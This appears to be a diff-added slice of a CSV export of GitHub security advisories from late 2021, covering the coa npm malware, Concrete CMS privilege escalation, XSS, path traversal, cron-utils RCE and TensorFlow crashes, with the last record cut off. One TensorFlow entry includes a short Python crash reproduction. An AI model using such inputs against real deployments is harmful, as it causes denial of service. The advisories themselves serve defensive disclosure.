+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",[],"[{'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.0.3']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.0.4']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.1.1']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.1.3']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['3.0.1']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['3.1.3']}]","[{'type': 'WEB', 'url': 'https://github.com/veged/coa/issues/99'}, {'type': 'PACKAGE', 'url': 'https://github.com/veged/coa'}, {'type': 'WEB', 'url': 'https://therecord.media/malware-found-in-coa-and-rc-two-npm-packages-with-23m-weekly-downloads/'}, {'type': 'WEB', 'url': 'https://www.virustotal.com/gui/file/26451f7f6fe297adf6738295b1dcc70f7678434ef21d8b6aad5ec00beb8a72cf?nocache=1'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:19:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j4mv-2rv7-v2j9,2022-07-13T19:06:19Z,2021-11-23T18:18:07Z,,['CVE-2021-22966'],Improper Privilege Management in Concrete CMS ,"Privilege escalation from Editor to Admin using Groups in Concrete CMS versions 8.5.6 and below. If a group is granted ""view"" permissions on the bulkupdate page, then users in that group can escalate to being an administrator with a specially crafted curl. Fixed by adding a check for group permissions before allowing a group to be moved.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22966'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1362747'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:31:34Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}"
+1.4.0,GHSA-9j9m-8wjc-ff96,2022-08-22T22:01:24Z,2021-11-10T17:02:44Z,,['CVE-2021-25979'], Apostrophe CMS Insufficient Session Expiration vulnerability,"Apostrophe CMS versions between 2.63.0 to 3.3.1 affected by an insufficient session expiration vulnerability, which allows unauthenticated remote attackers to hijack recently logged-in users' sessions. As a mitigation for older releases the user account in question can be archived (3.x) or moved to the trash (2.x and earlier) which does disable the existing session.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'apostrophe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.63.0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25979'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/apostrophe/commit/c211b211f9f4303a77a307cf41aac9b4ef8d2c7c'}, {'type': 'PACKAGE', 'url': 'https://github.com/apostrophecms/apostrophe'}]","{'cwe_ids': ['CWE-613'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-09T21:01:19Z', 'nvd_published_at': '2021-11-08T15:15:00Z'}"
+1.4.0,GHSA-6g47-63mv-qpgh,2021-11-04T17:01:59Z,2021-11-08T17:55:48Z,,['CVE-2021-23624'],Prototype Pollution in dotty,This affects the package dotty before 0.1.2. A type confusion vulnerability can lead to a bypass of CVE-2021-25912 when the user-provided keys used in the path parameter are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'dotty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23624'}, {'type': 'WEB', 'url': 'https://github.com/deoxxa/dotty/commit/88f61860dcc274a07a263c32cbe9d44c24ef02d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/deoxxa/dotty'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOTTY-1577292'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:01:59Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-8c5p-4362-9333,2021-11-08T21:30:39Z,2021-11-10T16:48:15Z,,['CVE-2021-3924'],Path traversal in grav,grav is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3924'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/8f9c417c04b89dc8d2de60b95e7696821b2826ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7ca13522-d0c9-4eff-a7dd-6fd1a7f205a2'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:30:39Z', 'nvd_published_at': '2021-11-05T15:15:00Z'}"
+1.4.0,GHSA-j86v-p27c-73fm,2021-11-08T22:49:15Z,2021-11-10T19:17:43Z,,['CVE-2021-41201'],Unitialized access in `EinsumHelper::ParseEquation`,"### Impact
+During execution, [`EinsumHelper::ParseEquation()`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/linalg/einsum_op_impl.h#L126-L181) is supposed to set the flags in `input_has_ellipsis` vector and `*output_has_ellipsis` boolean to indicate whether there is ellipsis in the corresponding inputs and output.
+
+However, the code only changes these flags to `true` and never assigns `false`.
+
+```cc
+for (int i = 0; i < num_inputs; ++i) {
+ input_label_counts->at(i).resize(num_labels);
+ for (const int label : input_labels->at(i)) {
+ if (label != kEllipsisLabel)
+ input_label_counts->at(i)[label] += 1;
+ else
+ input_has_ellipsis->at(i) = true;
+ }
+}
+output_label_counts->resize(num_labels);
+for (const int label : *output_labels) {
+ if (label != kEllipsisLabel)
+ output_label_counts->at(label) += 1;
+ else
+ *output_has_ellipsis = true;
+}
+```
+
+This results in unitialized variable access if callers assume that `EinsumHelper::ParseEquation()` always sets these flags.
+
+
+### Patches
+We have patched the issue in GitHub commit [f09caa532b6e1ac8d2aa61b7832c78c5b79300c6](https://github.com/tensorflow/tensorflow/commit/f09caa532b6e1ac8d2aa61b7832c78c5b79300c6).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j86v-p27c-73fm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41201'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f09caa532b6e1ac8d2aa61b7832c78c5b79300c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:49:15Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-pfj7-2qfw-vwgm,2022-09-14T20:37:56Z,2021-11-30T22:20:43Z,,['CVE-2021-43788'],NodeBB vulnerable to path traversal in translator module,"### Impact
+Prior to v1.18.5, a path traversal vulnerability was present that allowed users to access JSON files outside of the expected `languages/` directory.
+
+### Patches
+The vulnerability has been patched as of v1.18.5.
+
+### Workarounds
+Cherry-pick commit hash `c8b2fc46dc698db687379106b3f01c71b80f495f` to receive this patch in lieu of a full upgrade.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@nodebb.org](mailto:security@nodebb.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.4'}, {'fixed': '1.18.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-pfj7-2qfw-vwgm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43788'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/c8b2fc46dc698db687379106b3f01c71b80f495f'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/nodebb-remote-code-execution-with-one-shot/'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/releases/tag/v1.18.5'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:14Z', 'nvd_published_at': '2021-11-29T20:15:00Z'}"
+1.4.0,GHSA-5m8f-chrv-7rw5,2023-09-18T19:45:26Z,2021-11-23T18:04:47Z,,['CVE-2021-43668'],Denial of Service in Go-Ethereum,"Go-Ethereum 1.10.9 nodes crash (denial of service) after receiving a serial of messages and cannot be recovered. They will crash with ""runtime error: invalid memory address or nil pointer dereference"" and arise a SEGV signal.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.10.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43668'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/issues/23866'}, {'type': 'WEB', 'url': 'https://github.com/syndtr/goleveldb/issues/373'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-19T13:19:43Z', 'nvd_published_at': '2021-11-18T16:15:00Z'}"
+1.4.0,GHSA-q3j3-w37x-hq2q,2021-11-25T00:18:27Z,2021-11-24T20:04:25Z,,['CVE-2021-41267'],Webcache Poisoning in symfony/http-kernel,"Description
+-----------
+
+When a Symfony application is running behind a proxy or a load-balancer, you can tell Symfony to look for the `X-Forwarded-*` HTTP headers. HTTP headers that are not part of the ""trusted_headers"" allowed list are ignored and protect you from ""Cache poisoning"" attacks.
+
+In Symfony 5.2, we've added support for the `X-Forwarded-Prefix` header, but this header was accessible in sub-requests, even if it was not part of the ""trusted_headers"" allowed list. An attacker could leverage this opportunity to forge requests containing a `X-Forwarded-Prefix` HTTP header, leading to a web cache poisoning issue.
+
+Resolution
+----------
+
+Symfony now ensures that the `X-Forwarded-Prefix` HTTP header is not forwarded to sub-requests when it is not trusted.
+
+The patch for this issue is available [here](https://github.com/symfony/symfony/commit/95dcf51682029e89450aee86267e3d553aa7c487) for branch 5.3.
+
+Credits
+-------
+
+We would like to thank Soner Sayakci for reporting the issue and Jérémy Derussé for fixing the issue.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.3.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-q3j3-w37x-hq2q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41267'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/pull/44243'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/95dcf51682029e89450aee86267e3d553aa7c487'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v5.3.12'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T19:58:05Z', 'nvd_published_at': '2021-11-24T19:15:00Z'}"
+1.4.0,GHSA-w4v7-hwx7-9929,2021-11-08T17:49:56Z,2021-11-08T17:50:10Z,,['CVE-2021-23784'],Cross-site Scripting in tempura,"This affects the package tempura before 0.4.0. If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tempura'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23784'}, {'type': 'WEB', 'url': 'https://github.com/lukeed/tempura/commit/58a5c3671e2f36b26810e77ead9e0dd471902f9b'}, {'type': 'PACKAGE', 'url': 'https://github.com/lukeed/tempura'}, {'type': 'WEB', 'url': 'https://github.com/lukeed/tempura/releases/tag/v0.4.0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TEMPURA-1569633'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:59:09Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-p9m8-27x8-rg87,2021-11-15T22:23:17Z,2021-11-15T23:27:11Z,,['CVE-2021-41269'],Critical vulnerability found in cron-utils,"### Impact
+A Template Injection was identified in cron-utils enabling attackers to inject arbitrary Java EL expressions, leading to unauthenticated Remote Code Execution (RCE) vulnerability. Versions up to 9.1.2 are susceptible to this vulnerability. Please note, that only projects using the @Cron annotation to validate untrusted Cron expressions are affected.
+
+### Patches
+The issue was patched and a new version was released. Please upgrade to version 9.1.6.
+
+### Workarounds
+There are no known workarounds up to this moment.
+
+### References
+A description of the issue is provided in [issue 461](https://github.com/jmrozanec/cron-utils/issues/461)
+
+### For more information
+If you have any questions or comments about this advisory:
+
+Open an issue in the [cron-utils Github repository](https://github.com/jmrozanec/cron-utils)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.cronutils:cron-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/security/advisories/GHSA-p9m8-27x8-rg87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41269'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/issues/461'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/commit/cfd2880f80e62ea74b92fa83474c2aabdb9899da'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/commit/d6707503ec2f20947f79e38f861dba93b39df9da'}, {'type': 'PACKAGE', 'url': 'https://github.com/jmrozanec/cron-utils'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:23:17Z', 'nvd_published_at': '2021-11-15T21:15:00Z'}"
+1.4.0,GHSA-g5gj-9ggf-9vmq,2021-11-10T18:18:55Z,2021-11-10T20:38:53Z,,['CVE-2021-3908'],Infinite certificate chain depth results in OctoRPKI running forever,"OctoRPKI does not limit the depth of a certificate chain, allowing for a CA to create children in an ad-hoc fashion, thereby making tree traversal never end.
+
+## Patches
+
+## For more information
+If you have any questions or comments about this advisory email us at security@cloudflare.com
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki/cmd/octorpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-g5gj-9ggf-9vmq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3908'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-400', 'CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:18:55Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}"
+1.4.0,GHSA-5jxc-hmqf-3f73,2021-11-01T14:06:13Z,2021-11-01T19:17:31Z,,['CVE-2021-3904'],Cross-Site Scripting in grav,grav prior to version 1.7.24 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3904'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/afc69a3229bb6fe120b2c1ea27bc6f196ed7284d'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b1182515-d911-4da9-b4f7-b4c341a62a8d'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-29T13:48:26Z', 'nvd_published_at': '2021-10-27T22:15:00Z'}"
+1.4.0,GHSA-cq76-mxrc-vchh,2021-11-08T22:57:24Z,2021-11-10T19:36:50Z,,['CVE-2021-41195'],Crash in `tf.math.segment_*` operations,"### Impact
+The implementation of `tf.math.segment_*` operations results in a `CHECK`-fail related abort (and denial of service) if a segment id in `segment_ids` is large.
+
+```python
+import tensorflow as tf
+
+tf.math.segment_max(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
+tf.math.segment_min(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
+tf.math.segment_mean(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
+tf.math.segment_sum(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
+tf.math.segment_prod(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
+```
+
+This is similar to [CVE-2021-29584](https://github.com/tensorflow/tensorflow/blob/3a74f0307236fe206b046689c4d76f57c9b74eee/tensorflow/security/advisory/tfsa-2021-071.md) (and similar other reported vulnerabilities in TensorFlow, localized to specific APIs): the [implementation](https://github.com/tensorflow/tensorflow/blob/dae66e518c88de9c11718cd0f8f40a0b666a90a0/tensorflow/core/kernels/segment_reduction_ops_impl.h) (both on CPU and GPU) computes the output shape using [`AddDim`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L395-L408). However, if the number of elements in the tensor overflows an `int64_t` value, `AddDim` results in a `CHECK` failure which provokes a `std::abort`. Instead, code should use [`AddDimWithStatus`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L410-L440).
+
+
+### Patches
+We have patched the issue in GitHub commit [e9c81c1e1a9cd8dd31f4e83676cab61b60658429](https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429) (merging [#51733](https://github.com/tensorflow/tensorflow/pull/51733)).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46888).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cq76-mxrc-vchh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41195'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46888'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/pull/51733'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:57:24Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-vx6v-xg64-pmr8,2021-11-17T21:10:26Z,2021-11-15T23:12:41Z,,['CVE-2021-3945'],Cross-site Scripting in django-helpdesk,django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-helpdesk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3945'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/commit/2c7065e0c4296e0c692fb4a7ee19c7357583af30'}, {'type': 'PACKAGE', 'url': 'https://github.com/django-helpdesk/django-helpdesk'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/745f483c-70ed-441f-ab2e-7ac1305439a4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T19:15:55Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}"
+1.4.0,GHSA-cq58-r77c-5jjw,2021-11-16T15:49:36Z,2021-11-16T17:04:41Z,,['CVE-2021-41258'],Cross-site scripting (XSS) from image block content in the site frontend,"### Impact
+
+Kirby's [blocks field](https://getkirby.com/docs/reference/panel/fields/blocks) stores structured data for each block. This data is then used in [block snippets](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) to convert the blocks to HTML for use in your templates. We recommend to [escape HTML special characters](https://getkirby.com/docs/guide/templates/escaping) against cross-site scripting (XSS) attacks.
+
+Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the site frontend or Panel session of other users. If the user is logged in to the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim.
+
+The default snippet for the [image block](https://getkirby.com/docs/reference/panel/blocks/image) unfortunately did not use our escaping helper. This made it possible to include malicious HTML code in the source, alt and link fields of the image block, which would then be displayed on the site frontend and executed in the browsers of site visitors and logged in users who are browsing the site.
+
+This vulnerability is critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible.
+
+You are *not* affected if you don't use the blocks field or specifically the image block in any of your blueprints. You are also protected if you use a custom [block snippet](https://getkirby.com/docs/reference/panel/fields/blocks#block-snippets) that either escapes the printed values or doesn't use them. The attack can only be performed by logged-in users and only surfaces in the site frontend (i.e. in your templates). The Panel itself is unaffected and will not execute JavaScript that was injected into the image block content.
+
+### Patches
+
+We have patched the vulnerability in [Kirby 3.5.8](https://github.com/getkirby/kirby/releases/tag/3.5.8) by escaping special HTML characters in the output from the default image block snippet. Please update to this or a [later version](https://github.com/getkirby/kirby/releases/) to fix the vulnerability.
+
+### Credits
+
